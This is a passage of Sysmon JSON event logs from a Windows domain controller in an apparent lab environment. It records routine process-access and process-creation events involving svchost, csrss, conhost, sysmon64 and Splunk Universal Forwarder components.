07:53:32.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2281,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2282,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2283,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2284,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.095\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F7B-5F25-0000-0010041A0400}\r\nTargetProcessId: 4048\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.095","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F7B-5F25-0000-0010041A0400}","TargetProcessId":"4048","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2285,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.251\r\nSourceProcessGUID: {41C8662E-1F7B-5F25-0000-0010041A0400}\r\nSourceProcessId: 4048\r\nSourceThreadId: 2436\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.251","SourceProcessGUID":"{41C8662E-1F7B-5F25-0000-0010041A0400}","SourceProcessId":"4048","SourceThreadId":"2436","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2286,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.773\r\nProcessGuid: {41C8662E-1F7C-5F25-0000-0010D21B0400}\r\nProcessId: 3928\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.773","ProcessGuid":"{41C8662E-1F7C-5F25-0000-0010D21B0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2287,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.939\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F7C-5F25-0000-0010D21B0400}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.939","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F7C-5F25-0000-0010D21B0400}","TargetProcessId":"3928","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2288,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.939\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F7C-5F25-0000-0010D21B0400}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.939","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F7C-5F25-0000-0010D21B0400}","TargetProcessId":"3928","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2289,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 